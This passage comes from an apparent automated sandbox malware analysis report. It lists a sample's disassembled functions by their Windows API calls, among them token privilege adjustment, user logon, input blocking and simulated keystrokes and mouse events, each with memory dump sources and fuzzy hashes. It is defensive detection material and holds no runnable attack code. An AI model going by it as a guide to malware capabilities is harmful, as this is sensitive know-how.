                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 599397726-0
                                                                                                                • Opcode ID: 1955f539a6b81a3f77e9a6b9298f936c9c9dba0152c1c21fd37fa9ef0b9325cc
                                                                                                                • Instruction ID: 5e8cdfb7934e043721a85d3a2a5dc903347df8cb9131751cdfe399be50734f89
                                                                                                                • Opcode Fuzzy Hash: 1955f539a6b81a3f77e9a6b9298f936c9c9dba0152c1c21fd37fa9ef0b9325cc
                                                                                                                • Instruction Fuzzy Hash: 2E412A71520A19FFEB109E90DC95EBFB7BDEB40325F50001AFA0566140EAB09E689B58
                                                                                                                Function 0024EA85 Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0024EA95
                                                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0024EAEF
                                                                                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0024EB3C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$DiskFreeSpace
                                                                                                                • String ID:
                                                                                                                • API String ID: 1682464887-0
                                                                                                                • Opcode ID: d67a6ff5d8bcba05dc91c64e47810ddf280b649337c038114dc24f5cf68b7e7e
                                                                                                                • Instruction ID: 2b16b4c3ad24d8762ed6e84502cccb6abe904b246676a752486952ff5febbcb8
                                                                                                                • Opcode Fuzzy Hash: d67a6ff5d8bcba05dc91c64e47810ddf280b649337c038114dc24f5cf68b7e7e
                                                                                                                • Instruction Fuzzy Hash: 7A215E35A10218EFCB04DFA5D894AEEBBB4FF48314F158099E805AB391DB31D965CF50
                                                                                                                Function 0023BEC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0022010A: std::exception::exception.LIBCMT ref: 0022013E
                                                                                                                  • Part of subcall function 0022010A: __CxxThrowException@8.LIBCMT ref: 00220153
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0023BF0F
                                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0023BF3C
                                                                                                                • GetLastError.KERNEL32 ref: 0023BF49
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                                • String ID:
                                                                                                                • API String ID: 1922334811-0
                                                                                                                • Opcode ID: 5ae1aeb83fd754cef40d2f7254b206016b56201ef5394f203ad79c896d03a2a9
                                                                                                                • Instruction ID: d07d51ac694ccfa4384ba173f52c8d7bf08894e7fad4cefc96da31041559f437
                                                                                                                • Opcode Fuzzy Hash: 5ae1aeb83fd754cef40d2f7254b206016b56201ef5394f203ad79c896d03a2a9
                                                                                                                • Instruction Fuzzy Hash: 1D11BFB1524305AFD718AF94ECC5D6AB7FDEB44710B20852EF44A96651DB70FC508F20
                                                                                                                Function 0024702F Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0024704C
                                                                                                                • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0024708D
                                                                                                                • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00247098
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 33631002-0
                                                                                                                • Opcode ID: f037783d25e226aeead8a7c17caf8f425138e0d08b4077861147182db1700e95
                                                                                                                • Instruction ID: 93df5b2aa27b42d540685d2094d1bf5cd69238e31d1b3a54f8978b55684033aa
                                                                                                                • Opcode Fuzzy Hash: f037783d25e226aeead8a7c17caf8f425138e0d08b4077861147182db1700e95
                                                                                                                • Instruction Fuzzy Hash: 3D115E75E11228BFEB148F94EC45BAEBBBCEB45B10F104152F914E7290D7B05A058BA1
                                                                                                                Function 0023BE31 Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0023BE5A
                                                                                                                • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0023BE71
                                                                                                                • FreeSid.ADVAPI32(?), ref: 0023BE81
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                • String ID:
                                                                                                                • API String ID: 3429775523-0
                                                                                                                • Opcode ID: b8f101f3a3512b8e61301870f8dbfd2a60b95ed24aaa59c3f215336a5013ec30
                                                                                                                • Instruction ID: 7a56156e9fa94d0dfe9c07beebab6819ec482eafe74261ad1ce23d933623f63c
                                                                                                                • Opcode Fuzzy Hash: b8f101f3a3512b8e61301870f8dbfd2a60b95ed24aaa59c3f215336a5013ec30
                                                                                                                • Instruction Fuzzy Hash: B2F0127A911319BFDF04DFE4ED89AEDBBB8EF08301F504469A602E21D1E37056449B10
                                                                                                                Function 0021DD92 Relevance: 4.5, APIs: 3, Instructions: 26fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetFileAttributesW.KERNEL32(0020C848,0020C848), ref: 0021DDA2
                                                                                                                • FindFirstFileW.KERNEL32(0020C848,?), ref: 00274A83
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$AttributesFindFirst
                                                                                                                • String ID:
                                                                                                                • API String ID: 4185537391-0
                                                                                                                • Opcode ID: 06a3649a9d32543c7345311117aedf0fe19bb39f6b74d8d0fd30bb7934b21bd4
                                                                                                                • Instruction ID: 151592c4427aaf9e53d6e614d5ce4cda57dd88b4609c08bab951041dd083a7b7
                                                                                                                • Opcode Fuzzy Hash: 06a3649a9d32543c7345311117aedf0fe19bb39f6b74d8d0fd30bb7934b21bd4
                                                                                                                • Instruction Fuzzy Hash: 4DE0D8324354029743247738FC4D8E9379C9E06338B100705F839C10E0E7B09D6486D6
                                                                                                                Function 0024FD47 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0024FD71
                                                                                                                • FindClose.KERNEL32(00000000), ref: 0024FDA1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                • String ID:
                                                                                                                • API String ID: 2295610775-0
                                                                                                                • Opcode ID: 9abfbb8e85c45be1d5c07a75b04e93ec8ad0527f115023fff535391a5d0bbf8f
                                                                                                                • Instruction ID: 7693790b883db214d0f774b04cdf525e7ae3ca0a3fd757427178c899bab8852b
                                                                                                                • Opcode Fuzzy Hash: 9abfbb8e85c45be1d5c07a75b04e93ec8ad0527f115023fff535391a5d0bbf8f
                                                                                                                • Instruction Fuzzy Hash: A711A1316202009FD714DF28D849A2AB7E9FF94324F40851EF8A99B291DB30EC158F81
                                                                                                                Function 0024D712 Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0025C2E2,?,?,00000000,?), ref: 0024D73F
                                                                                                                • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0025C2E2,?,?,00000000,?), ref: 0024D751
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFormatLastMessage
                                                                                                                • String ID:
                                                                                                                • API String ID: 3479602957-0
                                                                                                                • Opcode ID: a4e30e26add2a07ec1eef35be9b72e77ea88da211b6bb8f08874da1dbc89963b
                                                                                                                • Instruction ID: ed0805edc5f70c5f149d651304afada0872bf9f105b15d6578049c619f1dd0a8
                                                                                                                • Opcode Fuzzy Hash: a4e30e26add2a07ec1eef35be9b72e77ea88da211b6bb8f08874da1dbc89963b
                                                                                                                • Instruction Fuzzy Hash: B1F0E23551032DABDB10AFA4DC49FEA776CAF49360F008111B905D2082D2309940CFA0
                                                                                                                Function 00244B52 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00244B89
                                                                                                                • keybd_event.USER32(?,76C1C0D0,?,00000000), ref: 00244B9C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InputSendkeybd_event
                                                                                                                • String ID:
                                                                                                                • API String ID: 3536248340-0
                                                                                                                • Opcode ID: 33a313ab3985cda5a0e1dab3ac08b3d3354c91dc06bfbb370a25c7b87cb0d15c
                                                                                                                • Instruction ID: aefa820333c3350706bb805ea763985189a37d35afca2f635368b1b35c5dc279
                                                                                                                • Opcode Fuzzy Hash: 33a313ab3985cda5a0e1dab3ac08b3d3354c91dc06bfbb370a25c7b87cb0d15c
                                                                                                                • Instruction Fuzzy Hash: 05F0907491034EAFEB059FA0C809BBE7BB4EF00309F00840AF951A52D1D379C615DF90
                                                                                                                Function 0023B8B0 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0023B9EC), ref: 0023B8C5
                                                                                                                • CloseHandle.KERNEL32(?,?,0023B9EC), ref: 0023B8D7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                • String ID:
                                                                                                                • API String ID: 81990902-0
                                                                                                                • Opcode ID: a0810cec05cdc452377412fa0b643c66380ce327a9a48f2feb4a8c1a86fdcbd6
                                                                                                                • Instruction ID: 6748be30d011909391117350321647df6dca1e20c2c7e0a6214fc0acea5cb304
                                                                                                                • Opcode Fuzzy Hash: a0810cec05cdc452377412fa0b643c66380ce327a9a48f2feb4a8c1a86fdcbd6
                                                                                                                • Instruction Fuzzy Hash: F1E0BF75014511AFE7262B50FC49DB677E9EF04311B148419F55985471D7616CA4DB10
                                                                                                                Function 00228E3C Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,0020125D,00227A43,00200F35,?,?,00000001), ref: 00228E41
                                                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00228E4A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                • String ID:
                                                                                                                • API String ID: 3192549508-0
                                                                                                                • Opcode ID: 769b481ae70e0829195d329a25f3df673f55cb6e363b9d9209429c51b74a94b1
                                                                                                                • Instruction ID: c5a566ad4afa275f895ac55fa96596efbed91de2e148666bd3da473b157ed8db
                                                                                                                • Opcode Fuzzy Hash: 769b481ae70e0829195d329a25f3df673f55cb6e363b9d9209429c51b74a94b1
                                                                                                                • Instruction Fuzzy Hash: 65B09275045B08ABEA002BA1FC0DB883F68EB08A62F0040A0F61D440A08B6354548F92
                                                                                                                Function 00213680 Relevance: 2.5, APIs: 1, Instructions: 986COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharUpper
                                                                                                                • String ID:
                                                                                                                • API String ID: 3964851224-0
                                                                                                                • Opcode ID: fa839fd3a12e29de0f33668f36ac05921c11635159b047dbbbfaca66d02092fe
                                                                                                                • Instruction ID: bec5955022df2a8196b07c0e3f212cffe159c150fb59bcbcface235f781249a4
                                                                                                                • Opcode Fuzzy Hash: fa839fd3a12e29de0f33668f36ac05921c11635159b047dbbbfaca66d02092fe
                                                                                                                • Instruction Fuzzy Hash: BA927C70628341DFD724DF18C490BAAB7E1BF98304F14885DF98A8B292D771EDA5CB52
                                                                                                                Function 0022DF69 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8de9912d2d31376b1d9de71cb86809b5bd67b4fd76b472ea644f01bd12224e73
                                                                                                                • Instruction ID: 4845581dbe02c7899b0cc4ff74ccc9be741b87452b66835c93fb2db2a740b5b3
                                                                                                                • Opcode Fuzzy Hash: 8de9912d2d31376b1d9de71cb86809b5bd67b4fd76b472ea644f01bd12224e73
                                                                                                                • Instruction Fuzzy Hash: AE323431D39F515DDB239634E826335A28CAFB73C4F16D737E81AB5AA6EB28C4935100
                                                                                                                Function 0023113E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 323b74e5b2a4a136f923bd124e2641dbd07463d61d4ebafac7ec381e83b1621c
                                                                                                                • Instruction ID: bc503fb30411087136869e304c1e0c9b4437b9d89203da094a45cfe4e5026441
                                                                                                                • Opcode Fuzzy Hash: 323b74e5b2a4a136f923bd124e2641dbd07463d61d4ebafac7ec381e83b1621c
                                                                                                                • Instruction Fuzzy Hash: EEB1F420E3AF504DD72396399835336B65CAFBB2C5F91D71BFC1A74D62EB2185934280
                                                                                                                Function 0025703C Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • BlockInput.USER32(00000001), ref: 00257057
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BlockInput
                                                                                                                • String ID:
                                                                                                                • API String ID: 3456056419-0
                                                                                                                • Opcode ID: 387a22fe6e308b4d68dd2f96d157431695075a83364b8d996b92c7f5e1f619df
                                                                                                                • Instruction ID: 44a1f5132437464150c0b318f79761ac544d6b61a910391cf95596e2de34dc7c
                                                                                                                • Opcode Fuzzy Hash: 387a22fe6e308b4d68dd2f96d157431695075a83364b8d996b92c7f5e1f619df
                                                                                                                • Instruction Fuzzy Hash: 70E0D8352202049FC710EF69E408D96F7ECAF54350F008426FD45C7291DAB0EC148B90
                                                                                                                Function 00247DD5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00247DF8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: mouse_event
                                                                                                                • String ID:
                                                                                                                • API String ID: 2434400541-0
                                                                                                                • Opcode ID: cfd220181db6ffa6e4ffc7aaef629d84c3528a7059bb7dead00e66caf8405a5b
                                                                                                                • Instruction ID: c41454e37a57351f0d7c5573c3221f08bed32b285ef93d2b147f7ed7b58db97d
                                                                                                                • Opcode Fuzzy Hash: cfd220181db6ffa6e4ffc7aaef629d84c3528a7059bb7dead00e66caf8405a5b
                                                                                                                • Instruction Fuzzy Hash: 27D09EA597CA07F9FD2D1B209C2FF7A1208EB45781FA4568AB122C60C1EFD468645535
                                                                                                                Function 0023BE95 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0023BA6A), ref: 0023BEB3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
